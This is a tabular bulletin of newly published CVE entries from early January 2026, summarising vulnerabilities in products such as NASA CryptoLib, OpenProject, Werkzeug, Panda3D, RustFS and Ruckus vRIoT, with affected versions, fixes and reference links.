| n/a--TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 | An issue in TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 allows a remote attacker to escalate privileges via the application stores password hashes in MD5 format | 2026-01-09 | not yet calculated | CVE-2025-67279 | https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/ |
| n/a--TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 | In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple Hibernate Query Language injection vulnerabilities exist which allow a low privileged user to extract passwords of other users and access sensitive data of another user. | 2026-01-09 | not yet calculated | CVE-2025-67280 | https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/ |
| n/a--TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 | In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple SQL injection vulnerabilities exists which allow a low privileged and administrative user to access the database and its content. | 2026-01-09 | not yet calculated | CVE-2025-67281 | https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/ |
| n/a--Yonyou YonBIP v3 and before | In Yonyou YonBIP v3 and before, the LoginWithV8 interface in the series data application service system is vulnerable to path traversal, allowing unauthorized access to sensitive information within the system | 2026-01-09 | not yet calculated | CVE-2025-66744 | https://github.com/iSee857/YonYouBip-path-travel |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, an out-of-bounds heap read vulnerability in cryptography_encrypt() occurs when parsing JSON metadata from KMC server responses. The flawed strtok iteration pattern uses ptr + strlen(ptr) + 1 which reads one byte past allocated buffer boundaries when processing short or malformed metadata strings. This issue has been patched in version 1.4.3. | 2026-01-10 | not yet calculated | CVE-2026-21900 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-4g6v-36fv-qcvw https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, there is an out-of-bounds heap read vulnerability in cryptography_aead_encrypt(). This issue has been patched in version 1.4.3. | 2026-01-10 | not yet calculated | CVE-2026-22023 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-8w3h-q8jm-3chq https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the cryptography_encrypt() function allocates multiple buffers for HTTP requests and JSON parsing that are never freed on any code path. Each call leaks approximately 400 bytes of memory. Sustained traffic can gradually exhaust available memory. This issue has been patched in version 1.4.3. | 2026-01-10 | not yet calculated | CVE-2026-22024 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-r3wg-g8xv-gxvf https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, when the KMC server returns a non-200 HTTP status code, cryptography_encrypt() and cryptography_decrypt() return immediately without freeing previously allocated buffers. Each failed request leaks approximately 467 bytes. Repeated failures (from a malicious server or network issues) can gradually exhaust memory. This issue has been patched in version 1.4.3. | 2026-01-10 | not yet calculated | CVE-2026-22025 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-h74x-vwwr-mm5g https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the libcurl write_callback function in the KMC crypto service client allows unbounded memory growth by reallocating response buffers without any size limit or overflow check. A malicious KMC server can return arbitrarily large HTTP responses, forcing the client to allocate excessive memory until the process is terminated by the OS. This issue has been patched in version 1.4.3. | 2026-01-10 | not yet calculated | CVE-2026-22026 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-w9cm-q69w-34x7 https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the convert_hexstring_to_byte_array() function in the MariaDB SA interface writes decoded bytes into a caller-provided buffer without any capacity check. When importing SA fields from the database (e.g., IV, ARSN, ABM), a malformed or oversized hex string in the database can overflow the destination buffer, corrupting adjacent heap memory. This issue has been patched in version 1.4.3. | 2026-01-10 | not yet calculated | CVE-2026-22027 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-3m35-m689-h29x https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| Nokia--SR Linux | Nokia SR Linux is vulnerable to an authentication vulnerability allowing unauthorized access to the JSON-RPC service. When exploited, an invalid validation allows JSON RPC access without providing valid authentication credentials. | 2026-01-07 | not yet calculated | CVE-2025-0980 | Nokia Product Security Advisory |
| Noor Alam--Easy Media Download | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Noor Alam Easy Media Download easy-media-download allows Reflection Injection.This issue affects Easy Media Download: from n/a through <= 1.1.11. | 2026-01-08 | not yet calculated | CVE-2025-69169 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-media-download/vulnerability/wordpress-easy-media-download-plugin-1-1-11-css-injection-vulnerability?_s_id=cve |
| Open Microscopy Environment--Bio-Formats | Bio-Formats versions up to and including 8.3.0 contain an XML External Entity (XXE) vulnerability in the Leica Microsystems metadata parsing component (e.g., XLEF). The parser uses an insecurely configured DocumentBuilderFactory when processing Leica XML-based metadata files, allowing external entity expansion and external DTD loading. A crafted metadata file can trigger outbound network requests (SSRF), access local system resources where readable, or cause a denial of service during XML parsing. | 2026-01-07 | not yet calculated | CVE-2026-22186 | https://seclists.org/fulldisclosure/2026/Jan/6 https://docs.openmicroscopy.org/bio-formats/ https://www.vulncheck.com/advisories/bio-formats-xxe-in-leica-xlef-metadata-parser |
| Open Microscopy Environment--Bio-Formats | Bio-Formats versions up to and including 8.3.0 perform unsafe Java deserialization of attacker-controlled memoization cache files (.bfmemo) during image processing. The loci.formats.Memoizer class automatically loads and deserializes memo files associated with images without validation, integrity checks, or trust enforcement. An attacker who can supply a crafted .bfmemo file alongside an image can trigger deserialization of untrusted data, which may result in denial of service, logic manipulation, or potentially remote code execution in environments where suitable gadget chains are present on the classpath. | 2026-01-07 | not yet calculated | CVE-2026-22187 | https://seclists.org/fulldisclosure/2026/Jan/7 https://docs.openmicroscopy.org/bio-formats/ https://www.vulncheck.com/advisories/bio-formats-memoizer-unsafe-deserialization-via-bfmemo-cache-files |
| open-metadata--OpenMetadata | OpenMetadata is a unified metadata platform. Versions prior to 1.11.4 are vulnerable to remote code execution via Server-Side Template Injection (SSTI) in FreeMarker email templates. An attacker must have administrative privileges to exploit the vulnerability. Version 1.11.4 contains a patch. | 2026-01-08 | not yet calculated | CVE-2026-22244 | https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-5f29-2333-h9c7 https://github.com/open-metadata/OpenMetadata/commit/bffe7c45807763f9b682021d4211c478d2a08bb3 |
| OpenFlagr--Flagr | OpenFlagr versions prior to and including 1.1.18 contain an authentication bypass vulnerability in the HTTP middleware. Due to improper handling of path normalization in the whitelist logic, crafted requests can bypass authentication and access protected API endpoints without valid credentials. Unauthorized access may allow modification of feature flags and export of sensitive data. | 2026-01-07 | not yet calculated | CVE-2026-0650 | https://github.com/openflagr/flagr/releases/tag/1.1.19 https://dreyand.rs/code%20review/golang/2026/01/03/0day-speedrun-openflagr-less-1118-authentication-bypass https://www.vulncheck.com/advisories/openflagr-authentication-bypass-via-prefix-whitelist-path-normalization |
| OpenLDAP Foundation--OpenLDAP | OpenLDAP Lightning Memory-Mapped Database (LMDB) versions up to and including 0.9.14, prior to commit 8e1fda8, contain a heap buffer underflow in the readline() function of mdb_load. When processing malformed input containing an embedded NUL byte, an unsigned offset calculation can underflow and cause an out-of-bounds read of one byte before the allocated heap buffer. This can cause mdb_load to crash, leading to a limited denial-of-service condition. | 2026-01-07 | not yet calculated | CVE-2026-22185 | https://seclists.org/fulldisclosure/2026/Jan/5 https://seclists.org/fulldisclosure/2026/Jan/8 https://www.openldap.org/ https://www.vulncheck.com/advisories/openldap-lmdb-mdb-load-heap-buffer-underflow-in-readline https://bugs.openldap.org/show_bug.cgi?id=10421 |
| opf--openproject | OpenProject is an open-source, web-based project management software. For OpenProject version 16.6.1 and below, a registered administrator can execute arbitrary command by configuring sendmail binary path and sending a test email. This issue has been patched in version 16.6.2. | 2026-01-10 | not yet calculated | CVE-2026-22601 | https://github.com/opf/openproject/security/advisories/GHSA-9vrv-7h26-c7jc https://github.com/opf/openproject/releases/tag/v16.6.2 |
| opf--openproject | OpenProject is an open-source, web-based project management software. Prior to version 16.6.2, OpenProject's unauthenticated password-change endpoint (/account/change_password) was not protected by the same brute-force safeguards that apply to the normal login form. In affected versions, an attacker who can guess or enumerate user IDs can send unlimited password-change requests for a given account without triggering lockout or other rate-limiting controls. This allows automated password-guessing (e.g., with wordlists of common passwords) against valid accounts. Successful guessing results in full account compromise for the targeted user and, depending on that user's role, can lead to further privilege escalation inside the application. This issue has been patched in version 16.6.2. Those who are unable to upgrade may apply the patch manually. | 2026-01-10 | not yet calculated | CVE-2026-22603 | https://github.com/opf/openproject/security/advisories/GHSA-93x5-prx9-x239 https://github.com/opf/openproject/pull/21272 https://github.com/opf/openproject/commit/2b394b9ba5af1e5d96a64d7d452d4d44598a4c7f https://github.com/opf/openproject/releases/tag/v16.6.2 |
| opf--openproject | OpenProject is an open-source, web-based project management software. For OpenProject versions from 11.2.1 to before 16.6.2, when sending a POST request to the /account/change_password endpoint with an arbitrary User ID as the password_change_user_id parameter, the resulting error page would show the username for the requested user. Since this endpoint is intended to be called without being authenticated, this allows to enumerate the user names of all accounts registered in an OpenProject instance. This issue has been patched in version 16.6.2. | 2026-01-10 | not yet calculated | CVE-2026-22604 | https://github.com/opf/openproject/security/advisories/GHSA-q7qp-p3vw-j2fh https://github.com/opf/openproject/pull/3451 https://github.com/opf/openproject/commit/2cff5e98649e32a197a62659a23dd4b864b7855b https://github.com/opf/openproject/releases/tag/v16.6.2 |
| pallets--werkzeug | Werkzeug is a comprehensive WSGI web application library. Prior to version 3.1.5, Werkzeug's safe_join function allows path segments with Windows device names that have file extensions or trailing spaces. On Windows, there are special device names such as CON, AUX, etc that are implicitly present and readable in every directory. Windows still accepts them with any file extension, such as CON.txt, or trailing spaces such as CON. This issue has been patched in version 3.1.5. | 2026-01-08 | not yet calculated | CVE-2026-21860 | https://github.com/pallets/werkzeug/security/advisories/GHSA-87hc-h4r5-73f7 https://github.com/pallets/werkzeug/commit/7ae1d254e04a0c33e241ac1cca4783ce6c875ca3 |
| Panda3D--Panda3D | Panda3D versions up to and including 1.10.16 deploy-stub contains a denial of service vulnerability due to unbounded stack allocation. The deploy-stub executable allocates argv_copy and argv_copy2 using alloca() based directly on the attacker-controlled argc value without validation. Supplying a large number of command-line arguments can exhaust stack space and propagate uninitialized stack memory into Python interpreter initialization, resulting in a reliable crash and undefined behavior. | 2026-01-07 | not yet calculated | CVE-2026-22188 | https://seclists.org/fulldisclosure/2026/Jan/9 https://www.panda3d.org/ https://github.com/panda3d/panda3d https://www.vulncheck.com/advisories/panda3d-deploy-stub-stack-exhaustion-via-unbounded-alloca |
| Panda3D--Panda3D | Panda3D versions up to and including 1.10.16 egg-mkfont contains a stack-based buffer overflow vulnerability due to use of an unbounded sprintf() call with attacker-controlled input. When constructing glyph filenames, egg-mkfont formats a user-supplied glyph pattern (-gp) into a fixed-size stack buffer without length validation. Supplying an excessively long glyph pattern string can overflow the stack buffer, resulting in memory corruption and a deterministic crash. Depending on build configuration and execution environment, the overflow may also be exploitable for arbitrary code execution. | 2026-01-07 | not yet calculated | CVE-2026-22189 | https://seclists.org/fulldisclosure/2026/Jan/10 https://www.panda3d.org/ https://github.com/panda3d/panda3d https://www.vulncheck.com/advisories/panda3d-egg-mkfont-stack-buffer-overflow |
| Panda3D--Panda3D | Panda3D versions up to and including 1.10.16 egg-mkfont contains an uncontrolled format string vulnerability. The -gp (glyph pattern) command-line option is used directly as the format string for sprintf() with only a single argument supplied. If an attacker provides additional format specifiers, egg-mkfont may read unintended stack values and write the formatted output into generated .egg and .png files, resulting in disclosure of stack-resident memory and pointer values. | 2026-01-07 | not yet calculated | CVE-2026-22190 | https://seclists.org/fulldisclosure/2026/Jan/11 https://www.panda3d.org/ https://github.com/panda3d/panda3d https://www.vulncheck.com/advisories/panda3d-egg-mkfont-format-string-information-disclosure |
| parallax--jsPDF | jsPDF is a library to generate PDFs in JavaScript. Prior to version 4.0.0, user control of the first argument of the loadFile method in the node.js build allows local file inclusion/path traversal. If given the possibility to pass unsanitized paths to the loadFile method, a user can retrieve file contents of arbitrary files in the local file system the node process is running in. The file contents are included verbatim in the generated PDFs. Other affected methods are `addImage`, `html`, and `addFont`. Only the node.js builds of the library are affected, namely the `dist/jspdf.node.js` and `dist/jspdf.node.min.js` files. The vulnerability has been fixed in jsPDF@4.0.0. This version restricts file system access per default. This semver-major update does not introduce other breaking changes. Some workarounds areavailable. With recent node versions, jsPDF recommends using the `--permission` flag in production. The feature was introduced experimentally in v20.0.0 and is stable since v22.13.0/v23.5.0/v24.0.0. For older node versions, sanitize user-provided paths before passing them to jsPDF. | 2026-01-05 | not yet calculated | CVE-2025-68428 | https://github.com/parallax/jsPDF/security/advisories/GHSA-f8cm-6447-x5h2 https://github.com/parallax/jsPDF/commit/a688c8f479929b24a6543b1fa2d6364abb03066d https://github.com/parallax/jsPDF/releases/tag/v4.0.0 |
| Pinpoll--Pinpoll | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pinpoll Pinpoll pinpoll allows Reflected XSS.This issue affects Pinpoll: from n/a through <= 4.0.0. | 2026-01-08 | not yet calculated | CVE-2025-68889 | https://vdp.patchstack.com/database/Wordpress/Plugin/pinpoll/vulnerability/wordpress-pinpoll-plugin-3-0-22-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| PIONEER CORPORATION--USB DAC Amplifier APS-DA101JS | The installers for multiple products provided by PIONEER CORPORATION contain an issue with the DLL search path, which may lead to insecurely loading Dynamic Link Libraries. As a result, arbitrary code may be executed with the privileges of the running installer. | 2026-01-08 | not yet calculated | CVE-2026-21427 | https://jpn.pioneer/ja/support/software/stellanova/dac_driver/ https://jvn.jp/en/jp/JVN17956874/ |
| Plat'Home Co.,Ltd.--OpenBlocks IoT DX1 (FW5.0.x) | Authentication bypass issue exists in OpenBlocks series versions prior to FW5.0.8, which may allow an attacker to bypass administrator authentication and change the password. | 2026-01-06 | not yet calculated | CVE-2026-21411 | https://www.plathome.co.jp/support/software/fw5/dx1-v5-0-8/ https://jvn.jp/en/vu/JVNVU97172240/ |
| POSIMYTH--UiChemy | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in POSIMYTH UiChemy uichemy allows Stored XSS.This issue affects UiChemy: from n/a through <= 4.4.2. | 2026-01-06 | not yet calculated | CVE-2025-69362 | https://vdp.patchstack.com/database/Wordpress/Plugin/uichemy/vulnerability/wordpress-uichemy-plugin-4-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| preactjs--preact | Preact, a lightweight web development framework, JSON serialization protection to prevent Virtual DOM elements from being constructed from arbitrary JSON. A regression introduced in Preact 10.26.5 caused this protection to be softened. In applications where values from JSON payloads are assumed to be strings and passed unmodified to Preact as children, a specially-crafted JSON payload could be constructed that would be incorrectly treated as a valid VNode. When this chain of failures occurs it can result in HTML injection, which can allow arbitrary script execution if not mitigated by CSP or other means. Applications using affected Preact versions are vulnerable if they meet all of the following conditions: first, pass unmodified, unsanitized values from user-modifiable data sources (APIs, databases, local storage, etc.) directly into the render tree; second assume these values are strings but the data source could return actual JavaScript objects instead of JSON strings; and third, the data source either fails to perform type sanitization AND blindly stores/returns raw objects interchangeably with strings, OR is compromised (e.g., poisoned local storage, filesystem, or database). Versions 10.26.10, 10.27.3, and 10.28.2 patch the issue. The patch versions restore the previous strict equality checks that prevent JSON-parsed objects from being treated as valid VNodes. Other mitigations are available for those who cannot immediately upgrade. Validate input types, cast or validate network data, sanitize external data, and use Content Security Policy (CSP). | 2026-01-08 | not yet calculated | CVE-2026-22028 | https://github.com/preactjs/preact/security/advisories/GHSA-36hm-qxxp-pg3m |
| Proxy & VPN Blocker--Proxy & VPN Blocker | Missing Authorization vulnerability in Proxy & VPN Blocker Proxy & VPN Blocker proxy-vpn-blocker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Proxy & VPN Blocker: from n/a through <= 3.5.3. | 2026-01-06 | not yet calculated | CVE-2025-69353 | https://vdp.patchstack.com/database/Wordpress/Plugin/proxy-vpn-blocker/vulnerability/wordpress-proxy-vpn-blocker-plugin-3-5-3-broken-access-control-vulnerability?_s_id=cve |
| pterodactyl--panel | Pterodactyl is a free, open-source game server management panel. Versions 1.11.11 and below do not revoke active SFTP connections when a user is removed from a server instance or has their permissions changes with respect to file access over SFTP. This allows a user that was already connected to SFTP to remain connected and access files even after their permissions are revoked. A user must have been connected to SFTP at the time of their permissions being revoked in order for this vulnerability to be exploited. This issue is fixed in version 1.12.0. | 2026-01-06 | not yet calculated | CVE-2025-68954 | https://github.com/pterodactyl/panel/security/advisories/GHSA-8c39-xppg-479c https://github.com/pterodactyl/panel/commit/2bd9d8baddb0e0606e4a9d5be402f48678ac88d5 https://github.com/pterodactyl/panel/releases/tag/v1.12.0 |
| PublishPress--Post Expirator | Missing Authorization vulnerability in PublishPress Post Expirator post-expirator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post Expirator: from n/a through <= 4.9.3. | 2026-01-06 | not yet calculated | CVE-2025-69361 | https://vdp.patchstack.com/database/Wordpress/Plugin/post-expirator/vulnerability/wordpress-post-expirator-plugin-4-9-3-broken-access-control-vulnerability?_s_id=cve |
| purethemes--Listeo Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes Listeo Core listeo-core allows Reflected XSS.This issue affects Listeo Core: from n/a through < 2.0.19. | 2026-01-08 | not yet calculated | CVE-2025-67932 | https://vdp.patchstack.com/database/Wordpress/Plugin/listeo-core/vulnerability/wordpress-listeo-core-plugin-2-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve |
| py-pdf--pypdf | pypdf is a free and open-source pure-python PDF library. Prior to version 6.6.0, pypdf has possible long runtimes for missing /Root object with large /Size values. An attacker who uses this vulnerability can craft a PDF which leads to possibly long runtimes for actually invalid files. This can be achieved by omitting the /Root entry in the trailer, while using a rather large /Size value. Only the non-strict reading mode is affected. This issue has been patched in version 6.6.0. | 2026-01-10 | not yet calculated | CVE-2026-22690 | https://github.com/py-pdf/pypdf/security/advisories/GHSA-4xc4-762w-m6cg https://github.com/py-pdf/pypdf/pull/3594 https://github.com/py-pdf/pypdf/commit/294165726b646bb7799be1cc787f593f2fdbcf45 https://github.com/py-pdf/pypdf/releases/tag/6.6.0 |
| py-pdf--pypdf | pypdf is a free and open-source pure-python PDF library. Prior to version 6.6.0, pypdf has possible long runtimes for malformed startxref. An attacker who uses this vulnerability can craft a PDF which leads to possibly long runtimes for invalid startxref entries. When rebuilding the cross-reference table, PDF files with lots of whitespace characters become problematic. Only the non-strict reading mode is affected. Only the non-strict reading mode is affected. This issue has been patched in version 6.6.0. | 2026-01-10 | not yet calculated | CVE-2026-22691 | https://github.com/py-pdf/pypdf/security/advisories/GHSA-4f6g-68pf-7vhv https://github.com/py-pdf/pypdf/pull/3594 https://github.com/py-pdf/pypdf/commit/294165726b646bb7799be1cc787f593f2fdbcf45 https://github.com/py-pdf/pypdf/releases/tag/6.6.0 |
| QantumThemes--Typify | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in QantumThemes Typify typify allows PHP Local File Inclusion.This issue affects Typify: from n/a through <= 3.0.2. | 2026-01-08 | not yet calculated | CVE-2025-22712 | https://vdp.patchstack.com/database/Wordpress/Theme/typify/vulnerability/wordpress-typify-theme-3-0-2-local-file-inclusion-vulnerability?_s_id=cve |
| redaxo--redaxo | REDAXO is a PHP-based content management system. Prior to version 5.20.2, authenticated users with backup permissions can read arbitrary files within the webroot via path traversal in the Backup addon's file export functionality. The Backup addon does not validate the `EXPDIR` POST parameter against the UI-generated allowlist of permitted directories. An attacker can supply relative paths containing `../` sequences (or even absolute paths inside the document root) to include any readable file in the generated `.tar.gz` archive. Version 5.20.2 fixes this issue. | 2026-01-07 | not yet calculated | CVE-2026-21857 | https://github.com/redaxo/redaxo/security/advisories/GHSA-824x-88xg-cwrv https://github.com/redaxo/redaxo/releases/tag/5.20.2 |
| rezmoss--axios4go | axios4go is a Go HTTP client library. Prior to version 0.6.4, a race condition vulnerability exists in the shared HTTP client configuration. The global `defaultClient` is mutated during request execution without synchronization, directly modifying the shared `http.Client`'s `Transport`, `Timeout`, and `CheckRedirect` properties. Impacted applications include that that use axios4go with concurrent requests (multiple goroutines, `GetAsync`, `PostAsync`, etc.), those where different requests use different proxy configurations, and those that handle sensitive data (authentication credentials, tokens, API keys). Version 0.6.4 fixes this issue. | 2026-01-07 | not yet calculated | CVE-2026-21697 | https://github.com/rezmoss/axios4go/security/advisories/GHSA-cmj9-27wj-7x47 https://github.com/rezmoss/axios4go/commit/b651604c64e66a115ab90cdab358b0181d74a842 https://github.com/rezmoss/axios4go/releases/tag/v0.6.4 |
| RiceTheme--Felan Framework | Authentication Bypass Using an Alternate Path or Channel vulnerability in RiceTheme Felan Framework felan-framework allows Authentication Abuse.This issue affects Felan Framework: from n/a through <= 1.1.3. | 2026-01-08 | not yet calculated | CVE-2025-23504 | https://vdp.patchstack.com/database/Wordpress/Plugin/felan-framework/vulnerability/wordpress-felan-framework-plugin-1-1-3-account-takeover-vulnerability?_s_id=cve |
| RiceTheme--Felan Framework | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RiceTheme Felan Framework felan-framework allows SQL Injection.This issue affects Felan Framework: from n/a through <= 1.1.3. | 2026-01-08 | not yet calculated | CVE-2025-23993 | https://vdp.patchstack.com/database/Wordpress/Plugin/felan-framework/vulnerability/wordpress-felan-framework-plugin-1-1-3-sql-injection-vulnerability?_s_id=cve |
| Ricoh Company, Ltd.--RICOH Streamline NX | Improper authorization vulnerability exists in RICOH Streamline NX 3.5.1 to 24R3. If a man-in-the-middle attack is conducted on the communication between the affected product and its user, and some crafted request is processed by the product, the user's registration information and/or OIDC (OpenID Connect) tokens may be retrieved. | 2026-01-09 | not yet calculated | CVE-2026-21409 | https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2025-000011 https://jvn.jp/en/jp/JVN12770174/ |
| RUCKUS Networks--vRIoT IOT Controller | The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 (GA) contain hardcoded credentials for an operating system user account within an initialization script. The SSH service is network-accessible without IP-based restrictions. Although the configuration disables SCP and pseudo-TTY allocation, an attacker can authenticate using the hardcoded credentials and establish SSH local port forwarding to access the Docker socket. By mounting the host filesystem via Docker, an attacker can escape the container and execute arbitrary OS commands as root on the underlying vRIoT controller, resulting in complete system compromise. | 2026-01-09 | not yet calculated | CVE-2025-69426 | https://support.ruckuswireless.com/security_bulletins/336 https://www.vulncheck.com/advisories/ruckus-vriot-iot-controller-hardcoded-ssh-credentials-rce |
| RUCKUS Networks--vRIoT IoT Controller | The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 (GA) expose a command execution service on TCP port 2004 running with root privileges. Authentication to this service relies on a hardcoded Time-based One-Time Password (TOTP) secret and an embedded static token. An attacker who extracts these credentials from the appliance or a compromised device can generate valid authentication tokens and execute arbitrary OS commands with root privileges, resulting in complete system compromise. | 2026-01-09 | not yet calculated | CVE-2025-69425 | https://support.ruckuswireless.com/security_bulletins/336 https://www.vulncheck.com/advisories/ruckus-vriot-iot-controller-hardcoded-tokens-rce |
| RustCrypto--elliptic-curves | RustCrypto: Elliptic Curves is general purpose Elliptic Curve Cryptography (ECC) support, including types and traits for representing various elliptic curve forms, scalars, points, and public/secret keys composed thereof. In versions 0.14.0-pre.0 and 0.14.0-rc.0, a critical vulnerability exists in the SM2 Public Key Encryption (PKE) implementation where the ephemeral nonce k is generated with severely reduced entropy. A unit mismatch error causes the nonce generation function to request only 32 bits of randomness instead of the expected 256 bits. This reduces the security of the encryption from a 128-bit level to a trivial 16-bit level, allowing a practical attack to recover the nonce k and decrypt any ciphertext given only the public key and ciphertext. This issue has been patched via commit e4f7778. | 2026-01-10 | not yet calculated | CVE-2026-22698 | https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-w3g8-fp6j-wvqw https://github.com/RustCrypto/elliptic-curves/pull/1600 https://github.com/RustCrypto/elliptic-curves/commit/4781762f23ff22ab34763410f648128055c93731 https://github.com/RustCrypto/elliptic-curves/commit/e4f77788130d065d760e57fb109370827110a525 https://crates.io/crates/sm2/0.14.0-pre.0 https://crates.io/crates/sm2/0.14.0-rc.0 |
| RustCrypto--RSA | The `rsa` crate is an RSA implementation written in rust. Prior to version 0.9.10, when creating a RSA private key from its components, the construction panics instead of returning an error when one of the primes is `1`. Version 0.9.10 fixes the issue. | 2026-01-08 | not yet calculated | CVE-2026-21895 | https://github.com/RustCrypto/RSA/security/advisories/GHSA-9c48-w39g-hm26 https://github.com/RustCrypto/RSA/commit/2926c91bef7cb14a7ccd42220a698cf4b1b692f7 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.78, RustFS contains a path traversal vulnerability in the /rustfs/rpc/read_file_stream endpoint. This issue has been patched in version 1.0.0-alpha.79. | 2026-01-07 | not yet calculated | CVE-2025-68705 | https://github.com/rustfs/rustfs/security/advisories/GHSA-pq29-69jg-9mxc https://github.com/rustfs/rustfs/commit/ab752458ce431c6397175d167beee2ea00507d3e |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.77, a malformed gRPC GetMetrics request causes get_metrics to unwrap() failed deserialization of metric_type/opts, panicking the handler thread and enabling remote denial of service of the metrics endpoint. This issue has been patched in version 1.0.0-alpha.78. | 2026-01-07 | not yet calculated | CVE-2025-69255 | https://github.com/rustfs/rustfs/security/advisories/GHSA-gw2x-q739-qhcr https://github.com/rustfs/rustfs/commit/eb33e82b56ed11fd12bb39416359d8d60737dc7a |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to version 1.0.0-alpha.79, he `ImportIam` admin API validates permissions using `ExportIAMAction` instead of `ImportIAMAction`, allowing a principal with export-only IAM permissions to perform import operations. Since importing IAM data performs privileged write actions (creating/updating users, groups, policies, and service accounts), this can lead to unauthorized IAM modification and privilege escalation. Version 1.0.0-alpha.79 fixes the issue. | 2026-01-08 | not yet calculated | CVE-2026-22042 | https://github.com/rustfs/rustfs/security/advisories/GHSA-vcwh-pff9-64cc |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 through 1.0.0-alpha.78, a flawed `deny_only` short-circuit in RustFS IAM allows a restricted service account or STS credential to self-issue an unrestricted service account, inheriting the parent's full privileges. This enables privilege escalation and bypass of session/inline policy restrictions. Version 1.0.0-alpha.79 fixes the issue. | 2026-01-08 | not yet calculated | CVE-2026-22043 | https://github.com/rustfs/rustfs/security/advisories/GHSA-xgr5-qc6w-vcg9 |
| Ryan Sutana--WP App Bar | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ryan Sutana WP App Bar wp-app-bar allows Reflected XSS.This issue affects WP App Bar: from n/a through <= 1.5. | 2026-01-08 | not yet calculated | CVE-2025-68891 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-app-bar/vulnerability/wordpress-wp-app-bar-plugin-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Salesforce--Uni2TS | Improper Control of Generation of Code ('Code Injection') vulnerability in Salesforce Uni2TS on MacOS, Windows, Linux allows Leverage Executable Code in Non-Executable Files.This issue affects Uni2TS: through 1.2.0. | 2026-01-09 | not yet calculated | CVE-2026-22584 | https://help.salesforce.com/s/articleView?id=005239354&type=1 |
| Samsung Mobile--Galaxy Store | Improper input validation in Galaxy Store prior to version 4.6.02 allows local attacker to execute arbitrary script. | 2026-01-09 | not yet calculated | CVE-2026-20976 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=01 |
